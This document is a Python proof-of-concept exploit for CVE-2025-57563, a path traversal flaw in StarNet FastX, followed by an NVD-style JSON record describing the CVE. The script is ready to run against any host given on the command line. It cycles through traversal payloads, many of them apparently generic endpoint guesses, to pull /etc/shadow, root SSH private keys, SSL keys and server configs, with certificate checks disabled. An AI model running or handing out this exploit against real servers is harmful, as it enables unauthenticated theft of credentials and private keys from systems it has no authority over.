CVE-2025-57563

# CVE-2025-57563 - StarNet FastX Path Traversal PoC # Vulnerability: Unauthenticated Path Traversal in FastX v4 through v4.1.51 # CVSS: 6.5 (MEDIUM) # Description: Allows unauthenticated attackers to read arbitrary files import requests import sys TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "https://target-fastx-server.com" TARGET_PORT = sys.argv[2] if len(sys.argv) > 2 else 443 # Path traversal payloads to test PAYLOADS = [ # Linux targets "/../../../../etc/passwd", "/../../../etc/passwd", "/../../etc/passwd", "/../etc/passwd", "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", "/..%2f..%2f..%2f..%2fetc/passwd", "/....//....//....//....//etc/passwd", "/static/../../../../etc/passwd", "/assets/../../../../etc/passwd", "/download/../../../../etc/passwd", "/file/../../../../etc/passwd", "/files/../../../../etc/passwd", "/getfile?file=../../../../etc/passwd", "/readfile?path=../../../../etc/passwd", "/load?file=../../../../etc/passwd", "/../etc/shadow", "/../../etc/shadow", "/../../../../root/.ssh/id_rsa", "/../../../../root/.ssh/authorized_keys", "/../../../../etc/fastx/fastx.conf", "/../../../../opt/fastx/conf/server.xml", # Windows targets "\\..\\..\\..\\..\\windows\\win.ini", "/../../../../windows/win.ini", "/../../../../windows/system32/drivers/etc/hosts", ] # Sensitive files to extract SENSITIVE_FILES = { "linux": [ "/etc/passwd", "/etc/shadow", "/etc/hosts", "/etc/fastx/fastx.conf", "/opt/fastx/conf/server.xml", "/root/.ssh/id_rsa", "/root/.ssh/authorized_keys", "/home/*/.ssh/id_rsa", "/etc/ssl/private/fastx.key", ], "windows": [ "/windows/win.ini", "/windows/system32/drivers/etc/hosts", "/fastx/conf/server.xml", ] } def exploit_path_traversal(base_url, target_file): """Attempt path traversal to read a specific file""" traversal_payloads = [ f"/..{target_file}", f"/../..{target_file}", f"/../../..{target_file}", f"/../../../..{target_file}", f"/../../../../..{target_file}", f"/static/..{target_file}", f"/assets/..{target_file}", f"/download?file=..{target_file}", f"/file?path=..{target_file}", f"/getfile?f=..{target_file}", ] for payload in traversal_payloads: url = f"{base_url}{payload}" try: response = requests.get(url, timeout=10, verify=False, headers={"User-Agent": "Mozilla/5.0"}) if response.status_code == 200 and len(response.content) > 0: # Check if response contains expected file content markers content = response.text if ("root:" in content or "[fonts]" in content or "BEGIN RSA" in content or "fastx" in content.lower() or "localhost" in content): print(f"[+] SUCCESS - Payload: {payload}") print(f"[+] URL: {url}") print(f"[+] Content:\n{content[:500]}") return response.text except Exception as e: continue return None def main(): print(f"[*] CVE-2025-57563 - StarNet FastX Path Traversal Exploit") print(f"[*] Target: {TARGET_HOST}:{TARGET_PORT}") print(f"[*] Severity: MEDIUM (CVSS 6.5)") print("-" * 60) base_url = f"{TARGET_HOST}:{TARGET_PORT}" # Attempt to read sensitive files for target_file in SENSITIVE_FILES["linux"]: print(f"\n[*] Attempting to read: {target_file}") result = exploit_path_traversal(base_url, target_file) if result: print(f"[+] File content retrieved successfully!") else: print(f"[-] Failed to retrieve file") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-57563", "sourceIdentifier": "[email protected]", "published": "2025-10-14T18:15:36.033", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal in StarNet Communications Corporation FastX v.4 through v4.1.51 allows unauthenticated attackers to read arbitrary files."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-24"}]}], "references": [{"url": "https://gitlab.com/daniele_m/cve-list/-/blob/main/README.md?ref_type=heads", "source": "[email protected]"}, {"url": "https://www.starnet.com/fastx/", "source": "[email protected]"}]}}